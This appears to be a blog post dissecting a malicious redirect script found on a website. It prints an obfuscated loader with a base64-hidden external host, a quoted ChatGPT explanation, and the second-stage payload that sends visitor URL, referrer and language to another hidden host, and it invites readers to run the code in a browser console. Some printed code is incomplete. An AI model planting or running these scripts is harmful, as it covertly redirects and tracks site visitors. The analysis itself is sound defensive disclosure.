Smart redirection malware

I have found this code:

!function(e,t){var r=Math.floor(,n=r-r%3600;if(r-=r%600,r=r.toString(16),!document.referrer)return;let a=atob("anMub3B0dHJh" + "Y2tlci5vbmxpbmU=");(t=e.createElement("script")).type="text/javascript",t.async=!0,t.src="https://"+a+"/event.min."+n+".js?v="+r,e.getElementsByTagName("head")[0].appendChild(t)}(document);

At first, it does not look very suspicious. And it is not detected by Sucuri SiteCheck malware scanner.

To get things done faster, I asked ChatGPT to decipher this code for me:

The provided code appears to be JavaScript code that dynamically creates a script element and appends it to the head of an HTML document. Let’s break down the code step by step:

  • The code starts with a self-invoking anonymous function:javascriptCopy code!function(e,t){ ... }(document); This function is immediately invoked and passed the document object as an argument.

  • Inside the function, it calculates the current time in seconds since the Unix epoch (the number of seconds that have passed since January 1, 1970) and then rounds it down to the nearest hour:javascriptCopy codevar r = Math.floor( / 1e3); // Get current time in seconds var n = r - (r % 3600); // Round down to the nearest hour

  • It converts the r value to a hexadecimal string:javascriptCopy coder = r.toString(16);

  • It checks if there is no referrer for the current page. If there is no referrer, it proceeds with the following code. The referrer typically indicates the URL of the previous page that linked to the current page. If there is no referrer, it might be used to detect if the page was opened directly or as an entry point.javascriptCopy codeif (!document.referrer) return;

  • It decodes a base64-encoded string and assigns it to the variable a. This decoded string appears to be a URL:javascriptCopy codelet a = atob("anMub3B0dHJhY2tlci5vbmxpbmU=");

  • It creates a new script element t, sets its type to “text/javascript,” makes it asynchronous, and sets its source (the URL) based on the a variable and the n and r values. It uses the values to construct a dynamic URL with a version parameter:javascriptCopy codet = e.createElement("script"); t.type = "text/javascript"; t.async = true; t.src = "https://" + a + "/event.min." + n + ".js?v=" + r;
  • Finally, it appends the script element t to the head of the HTML document, effectively adding the external JavaScript file specified by the constructed URL to the page:javascriptCopy codee.getElementsByTagName("head")[0].appendChild(t);

In summary, this code is a way to dynamically load an external JavaScript file into a web page based on the current time and referrer. The purpose and content of the external JavaScript file specified by the URL constructed in this code are not provided in the code snippet.

Final result:

[root@cayenne ~]# curl -s
!function(e,t){const n="search_active",r=document.cookie;document.cookie=n+"=1;path=/";const o=document.referrer&&document.referrer.split("/").length>2?document.referrer.split("/")[2]:document.referrer;if(!o||-1!=r.indexOf(n))return;if(-1==o.indexOf("google.")&&-1==o.indexOf("bing.")&&-1==o.indexOf("facebook.")&&-1==o.indexOf("yahoo")&&-1==o.indexOf("instagram")&&-1==o.indexOf("naver")&&-1==o.indexOf("pinterest"))return;const c=atob("c3BmLmpzLW1pbi5zaXRl");(t=e.createElement("script")).type="text/javascript",t.async=!0;let i=[];i.rr="tcgs3a7w",i.u=window.location.href,i.r=document.referrer,i.l=window.navigator.language,t.src="https://"+c+"/?"+btoa(function(e){const t=[];for(let n in e)t.push(encodeURIComponent(n)+"="+encodeURIComponent(e[n]));return t.join("&")}(i)),e.getElementsByTagName("head")[0].appendChild(t)}(document);[root@cayenne ~]# 

This is how the malware is “smart” and does not redirect same visitor a more than once.
It is doing a very good job in hiding itself by using Cookies, Referrer header, UserAgent and other data.

If you wanna see for yourself what this malware does open google in incognito window, do a search, open any website and paste the code inside console (inspect element).
You’ll be redirected. If you attempt to repeat action few times, even with fresh incognito window you’ll see that you are not being redirected anymore. Probably the site is tracking IP address as well, among other parameters.